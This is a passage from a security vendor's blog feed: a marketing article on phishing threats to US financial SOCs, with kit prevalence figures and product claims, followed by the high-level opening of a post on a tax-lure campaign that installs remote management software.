<p class="wp-block-paragraph">Analysts also face additional pressure when it comes to the evolving, ever-changing nature of modern malware and phishing threats. </p>



<p class="wp-block-paragraph">For instance, credential compromise can be mitigated comparatively easy through established authentication controls, credential resets, and account remediation. But session compromise, a method increasingly present in modern phishing campaigns like <a href="https://any.run/cybersecurity-blog/mirage2fa-phishing-targets-us-companies/" target="_blank" rel="noreferrer noopener">Mirage2FA</a>, creates a challenge at a more serious scale. Attackers can hijack an already authenticated session, making malicious activity harder to detect and contain. </p>



<p class="wp-block-paragraph">An extra layer of pressure comes from financial organizations operating under strict <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">compliance</a> and investigation requirements. This makes additionalinvestigation overhead particularly costly. </p>



<p class="wp-block-paragraph">Combined, these operational challenges have a very direct financial dimension. According to the FBI, business email compromise alone generated more than <strong>$55 billion in reported exposed losses globally </strong>between October 2013 and December 2023. </p>



<h2 class="wp-block-heading">The US Factor: Higher Stakes for Financial Organizations </h2>



<p class="wp-block-paragraph">The US phishing landscape overall comes with significant financial stakes. In 2025, the FBI recorded <strong>191,561 phishing and spoofing complaints,</strong> while <strong>business email compromise (BEC) generated more than $3 billion in reported losses.</strong> </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Reduce phishing risk with <span class="highlight">complete visibility</span>
<br>
Limit exposure through early detection with ANY.RUN
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/by-industry/finance/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=phishing-us-finance&#038;utm_term=260826&#038;utm_content=linktofinance#contact-sales" rel="noopener" target="_blank">
Explore ANY.RUN</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">The threat activity observed across financial organizations helps put this scale into context. Phishing kits such as Tycoon2FA, Sneaky2FA, EvilProxy, ClickFix, and Eviltokens are 5 of the most common threats seen in ANY.RUN investigations. In 2026 alone, leading phishing kits appeared in samples submitted for analysis by <strong>883 financial-sector organizations</strong> using ANY.RUN globally. </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-368"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="6"
           data-wpID="368"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Malware Family                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Prevalence                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-underline wpdt-tc-03A9F4"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        <a class="wpdt-link-content" href="https://any.run/cybersecurity-blog/salty2fa-tycoon2fa-hybrid-phishing-2025/"  rel="" target="_blank" data-cell-id="10" data-link-url="https://any.run/cybersecurity-blog/salty2fa-tycoon2fa-hybrid-phishing-2025/" data-link-text="Tycoon2FA" data-link-target="true" data-link-nofollow="0" data-link-noreferrer="0" data-link-sponsored="0" data-link-btn-status="0" data-link-btn-class="" data-link-content="wpdt-link-content">Tycoon2FA</a>                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        18.7%                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-underline wpdt-tc-03A9F4"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        <a class="wpdt-link-content" href="https://any.run/malware-trends/sneaky2fa/"  rel="" target="_blank" data-cell-id="20" data-link-url="https://any.run/malware-trends/sneaky2fa/" data-link-text="Sneaky2FA" data-link-target="true" data-link-nofollow="0" data-link-noreferrer="0" data-link-sponsored="0" data-link-btn-status="0" data-link-btn-class="" data-link-content="wpdt-link-content">Sneaky2FA</a>                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        17.1%                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-underline wpdt-tc-03A9F4"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        <a class="wpdt-link-content" href="https://any.run/malware-trends/evilproxy/"  rel="" target="_blank" data-cell-id="30" data-link-url="https://any.run/malware-trends/evilproxy/" data-link-text="EvilProxy" data-link-target="true" data-link-nofollow="0" data-link-noreferrer="0" data-link-sponsored="0" data-link-btn-status="0" data-link-btn-class="" data-link-content="wpdt-link-content">EvilProxy</a>                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        13.5%                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-underline wpdt-tc-03A9F4"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        <a class="wpdt-link-content" href="https://any.run/cybersecurity-blog/click-fix-attacks-eric-parker-analysis/"  rel="" target="_blank" data-cell-id="40" data-link-url="https://any.run/cybersecurity-blog/click-fix-attacks-eric-parker-analysis/" data-link-text="ClickFix" data-link-target="true" data-link-nofollow="0" data-link-noreferrer="0" data-link-sponsored="0" data-link-btn-status="0" data-link-btn-class="" data-link-content="wpdt-link-content">ClickFix</a>                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        11.8%                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-underline wpdt-tc-03A9F4"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        <a class="wpdt-link-content" href="https://any.run/cybersecurity-blog/eviltokens-ghost-code-analysis/"  rel="" target="_blank" data-cell-id="50" data-link-url="https://any.run/cybersecurity-blog/eviltokens-ghost-code-analysis/" data-link-text="EvilTokens" data-link-target="true" data-link-nofollow="0" data-link-noreferrer="0" data-link-sponsored="0" data-link-btn-status="0" data-link-btn-class="" data-link-content="wpdt-link-content">EvilTokens</a>                    </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        10.5%                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-368'>
table#wpdtSimpleTable-368{ table-layout: fixed !important; }
table#wpdtSimpleTable-368 td, table.wpdtSimpleTable368 th { white-space: normal !important; }
.wpdt-tc-03A9F4 { color: #03A9F4 !important;}
</style>




<p class="wp-block-paragraph">For US SOCs in particular, phishing pressure is also linked to local business and financial flows. Attackers adapt lures to events such as the US tax season, using fake tax forms, IRS-related communications, and other time-sensitive financial documents when employees are more likely to expect them. This adds another layer of credibility to attacks already designed to blend into legitimate workflows. </p>



<p class="wp-block-paragraph">The same principle extends to the tools and brands employees trust every day. Attackers abuse <a href="https://any.run/cybersecurity-blog/eviltokens-ghost-code-analysis/" target="_blank" rel="noreferrer noopener">Microsoft 365</a>, Adobe, cloud infrastructure, document-sharing services, and other legitimate services to make malicious activity harder to separate from normal business traffic. </p>



<p class="wp-block-paragraph">The result is a particularly costly combination: high phishing and BEC impact at the national level, while the threats financial SOCs investigate are becoming increasingly difficult to separate from legitimate activity. </p>



<h2 class="wp-block-heading">Top Solutions for SOC Challenges in Finance </h2>



<p class="wp-block-paragraph">A total of <strong>1,811 financial industry businesses use </strong><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong></a> products to investigate threats and strengthen their security operations. Their <a href="https://any.run/cybersecurity-blog/soc-business-success-cases-anyrun/" target="_blank" rel="noreferrer noopener">success stories</a> demonstrate measurable improvements across key SOC workflows, driven by solutions to some of the sector’s most persistent security challenges: </p>



<h3 class="wp-block-heading">1. Detecting Threats Before They Spread </h3>



<figure class="wp-block-pullquote"><blockquote><p><strong>14 sec</strong> </p><cite><strong>average MTTD with ANY.RUN</strong> </cite></blockquote></figure>



<p class="wp-block-paragraph">As phishing infrastructure and attack techniques change rapidly, making reactive defense strategy less efficient, early detection gives security teams more time to act. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="495" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/image2.png-1024x495.webp" alt="" class="wp-image-22893" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/image2.png-1024x495.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/image2.png-300x145.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/image2.png-768x371.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/image2.png-1536x742.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/image2.png-370x179.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/image2.png-270x130.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/image2.png-740x357.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/image2.png.webp 1849w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Full browser visibility within ANY.RUN Interactive Sandbox helps detect threats faster </figcaption></figure>



<p class="wp-block-paragraph">ANY.RUN combines <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">real-time behavioral analysis</a> with fresh threat intelligence to help analysts identify malicious activity before an initial compromise develops into a larger incident. This allows SOC teams to contain threats earlier and reduce their potential operational and financial impact. </p>



<h3 class="wp-block-heading">2. Catching More Evasive Threats </h3>



<figure class="wp-block-pullquote"><blockquote><p><strong>36% higher</strong> </p><cite><strong>detection rate</strong> with ANY.RUN</cite></blockquote></figure>



<p class="wp-block-paragraph">Modern phishing increasingly abuses legitimate services and tools and relies on evasion techniques that make malicious activity harder to recognize. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="539" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.40.53-1024x539.png" alt="" class="wp-image-22894" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.40.53-1024x539.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.40.53-300x158.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.40.53-768x404.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.40.53-1536x808.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.40.53-2048x1078.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.40.53-370x195.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.40.53-270x142.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.40.53-740x389.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Phishing is a prevalent threat in cybersecurity, with diverse methods abusing trust </figcaption></figure>



<p class="wp-block-paragraph">Interactive analysis exposes redirects, network connections, processes, payloads, and other behavior behind suspicious emails, URLs, and files, helping analysts uncover threats other detection may miss. </p>



<h3 class="wp-block-heading">3. Reducing Investigation Time </h3>



<figure class="wp-block-pullquote"><blockquote><p><strong>21 min less</strong> </p><cite><strong>MTTR per investigation</strong> </cite></blockquote></figure>



<p class="wp-block-paragraph">In finance, slow investigations can leave more time for identity compromise, data exposure, and financial impact. </p>



<p class="wp-block-paragraph">ANY.RUN gives analysts behavioral context and threat intelligence in one investigation workflow, reducing dwell time and manual work required to understand an attack and reach a reliable decision. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="539" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/TI-Reports-2048x1078.png-1024x539.webp" alt="" class="wp-image-22895" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/TI-Reports-2048x1078.png-1024x539.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/TI-Reports-2048x1078.png-300x158.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/TI-Reports-2048x1078.png-768x404.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/TI-Reports-2048x1078.png-1536x809.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/TI-Reports-2048x1078.png-370x195.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/TI-Reports-2048x1078.png-270x142.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/TI-Reports-2048x1078.png-740x390.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/TI-Reports-2048x1078.png.webp 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">TI Reports on malware and phishing attacks for deeper investigations</figcaption></figure>



<p class="wp-block-paragraph">To learn about the latest supply chain attacks early, SOC teams also rely on <a href="https://intelligence.any.run/reports/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktotireports" target="_blank" rel="noreferrer noopener">ANY.RUN’s TI Reports</a> that provide overviews of emerging threats. Curated by an expert team of threat intelligence analysts, these reports offer actionable indicators along with recommendations on how to detect new malware strains.</p>



<h3 class="wp-block-heading">4. Handling Higher Workloads with Fewer Escalations </h3>



<figure class="wp-block-pullquote"><blockquote><p><strong>Up to 30% fewer</strong> </p><cite><strong>Tier 1 → Tier 2 escalations</strong> </cite></blockquote></figure>



<p class="wp-block-paragraph">With workload per analyst 24% higher in finance than the global median, making better use of existing SOC capacity is critical. </p>



<p class="wp-block-paragraph">Detailed threat context helps Tier 1 analysts validate and resolve more cases independently, keeping senior analysts focused on incidents that require deeper investigation. </p>



<h3 class="wp-block-heading">5. Turning Every Investigation Into Broader Threat Visibility </h3>



<figure class="wp-block-pullquote"><blockquote><p><strong>24× more</strong> IOCs</p><cite><strong>for threat hunting and detection</strong> </cite></blockquote></figure>



<p class="wp-block-paragraph">A phishing investigation can provide value well beyond the initial verdict.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="499" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.43.19-1024x499.png" alt="" class="wp-image-22896" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.43.19-1024x499.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.43.19-300x146.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.43.19-768x374.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.43.19-1536x749.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.43.19-2048x998.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.43.19-370x180.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.43.19-270x132.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-08.43.19-740x361.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Threat Intelligence Feeds by ANY.RUN deliver 99% unique indicators to security stacks </figcaption></figure>



<p class="wp-block-paragraph">With <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>, ANY.RUN extracts IOCs and connects them with behavioral and threat context, providing them with intelligence to be reusedacross threat hunting, detection engineering, SIEM workflows, and future investigations. </p>



<p class="wp-block-paragraph">Using <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup,</a> your team can also track threats by industry and region. To browse US-submitted malware samples across financial organizations, use this TI Lookup query: </p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktotilookupquery/lookup#{%22query%22:%22submissionCountry:%5C%22US%5C%22%20AND%20industry:%5C%22finance%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">submissionCountry:&#8221;US&#8221; AND industry:&#8221;finance&#8221;</a> </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="475" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-09.49.55-1024x475.png" alt="" class="wp-image-22897" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-09.49.55-1024x475.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-09.49.55-300x139.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-09.49.55-768x356.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-09.49.55-1536x712.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-09.49.55-2048x949.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-09.49.55-370x172.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-09.49.55-270x125.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Screenshot-2026-08-26-at-09.49.55-740x343.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Threat Intelligence Lookup results for US-submitted IOCs across finance companies </figcaption></figure>



<p class="wp-block-paragraph">This allows you to take the upper hand in the race against threat actors and collect live threat intelligence from 16K+ SOCs and 700K+ security experts to strengthen proactive defense against modern phishing. </p>



<h2 class="wp-block-heading">Conclusion </h2>



<p class="wp-block-paragraph">American SOC teams across finance sector operate in a high-risk environment where sophisticated threats, growing alert volumes, strict security requirements, and pressure to respond quickly all converge. </p>



<p class="wp-block-paragraph">ANY.RUN helps close these gaps without increasing the amount of manual investigation required by combining interactive analysis with actionable threat intelligence. It provides analysts with opportunity to: </p>



<ul class="wp-block-list">
<li>Validate suspicious activity with real-time behavioral analysis in the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> </li>
</ul>



<ul class="wp-block-list">
<li>Uncover full attack behavior with process, network, and system activity visibility </li>
</ul>



<ul class="wp-block-list">
<li>Enrich IOCs with context using <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> </li>
</ul>



<ul class="wp-block-list">
<li>Identify related infrastructure by pivoting across connected URLs, domains, IPs, files, and analyses </li>
</ul>



<p class="wp-block-paragraph">For financial organizations, this translates into stronger threat visibility, faster and more confident investigations, and less operational pressure on SOC teams. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Turn threat data from <span class="highlight">16K+</span> orgs into stronger protection. 
<br>
Detect phishing activity before it impacts your business.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/by-industry/finance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktofinance#contact-sales" rel="noopener" target="_blank">
Strengthen Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph">With threat data continuously generated across 16K+ organizations and an average MTTD of 14 seconds, ANY.RUN helps security teams detect threats earlier, reduce exposure, and protect critical financial systems and customer data. </p>



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> is a leading provider of interactive malware analysis and threat intelligence solutions, helping organizations investigate threats faster and make informed response decisions based on clear behavioral evidence. </p>



<p class="wp-block-paragraph">Its solutions include the <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> for enterprise-scale malware and phishing analysis, as well as Threat Intelligence products powered by investigation data from more than 16,000 organizations. This intelligence enables security teams to enrich alerts, identify emerging threats earlier, and bring relevant context into detection, investigation, and response workflows. </p>



<p class="wp-block-paragraph">ANY.RUN is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II attested</a>, reflecting its commitment to robust security controls and customer data protection. For SOCs, <a href="https://any.run/mssp/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktomssp" target="_blank" rel="noreferrer noopener">MSSPs</a>, and <a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktoenterprise" target="_blank" rel="noreferrer noopener">enterprise</a> security teams, ANY.RUN helps reduce investigation uncertainty, speed up triage, and turn threat analysis into actionable security decisions. </p>
<p>The post <a href="https://any.run/cybersecurity-blog/phishing-us-finance/">US Finance Under Phishing Pressure: What the SOC Data Reveals?</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/phishing-us-finance/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>A Single Canadian Tax Lure Spread into a 46-Country, US-First RMM Campaign</title>
		<link>https://any.run/cybersecurity-blog/us-campaign-malware-analysis/</link>
					<comments>https://any.run/cybersecurity-blog/us-campaign-malware-analysis/#respond</comments>
		
		<dc:creator><![CDATA[ShiFu]]></dc:creator>
		<pubDate>Tue, 25 Aug 2026 10:40:19 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22827</guid>

					<description><![CDATA[<p>As ANY.RUN analysis shows, a campaign that initially appears to target Canadians with fake Canada Revenue Agency (CRA) T4 tax documents is actually part of a much broader remote-access campaign spanning 46 countries, with 45% of observed activity associated with the United States. The attackers impersonate trusted organizations and document types to trick victims into [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/us-campaign-malware-analysis/">A Single Canadian Tax Lure Spread into a 46-Country, US-First RMM Campaign</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">As <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> analysis shows, a campaign that initially appears to target Canadians with fake Canada Revenue Agency (CRA) T4 tax documents is actually part of a much broader remote-access campaign spanning 46 countries, with 45% of observed activity associated with the <a href="https://any.run/cybersecurity-blog/usa-top-30-threats-2026/" target="_blank" rel="noreferrer noopener">United States.</a> </p>



<p class="wp-block-paragraph">The attackers impersonate trusted <a href="https://any.run/cybersecurity-blog/soc-business-success-cases-anyrun/" target="_blank" rel="noreferrer noopener">organizations</a> and document types to trick victims into installing legitimate remote management software, giving them remote access to compromised systems. </p>



<h2 class="wp-block-heading">Part I. Campaign Scope, Impact, and Defense </h2>



<h3 class="wp-block-heading">Threat Overview </h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="772" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Vercel_Campaign_in-Brief-1024x772.png" alt="" class="wp-image-22866" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Vercel_Campaign_in-Brief-1024x772.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Vercel_Campaign_in-Brief-300x226.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Vercel_Campaign_in-Brief-768x579.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Vercel_Campaign_in-Brief-1536x1158.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Vercel_Campaign_in-Brief-2048x1545.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Vercel_Campaign_in-Brief-370x279.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Vercel_Campaign_in-Brief-270x204.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Vercel_Campaign_in-Brief-740x558.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Vercel_Campaign_in-Brief-80x60.png 80w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Campaign overview based on ANY.RUN research</figcaption></figure>



<p class="wp-block-paragraph">This phishing operation’s final goal is the remote control of the victim’s machine. A reusable fake-document kit delivers interchangeable, legitimate <a href="https://any.run/cybersecurity-blog/rmm-blind-spot-for-cisos/" target="_blank" rel="noreferrer noopener">RMM</a> software installer, which the attacker then abuses for hands-on access. </p>



<p class="wp-block-paragraph">Because the payload is signed commercial software, ordinary signature-based antivirus cannot flag it. Its activity resembles ordinary remote administration. </p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/reports/08-24-2026-cra-t4-rmm/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktotireports" target="_blank" rel="noreferrer noopener">View this malware analysis in TI Reports</a></p>



<p class="wp-block-paragraph">The campaign uses multiple lures, including the US Social Security Administration, Adobe PDF documents, invoices, VAT notices, and shipping communications, allowing the same attack model to target victims across different regions and business contexts. </p>



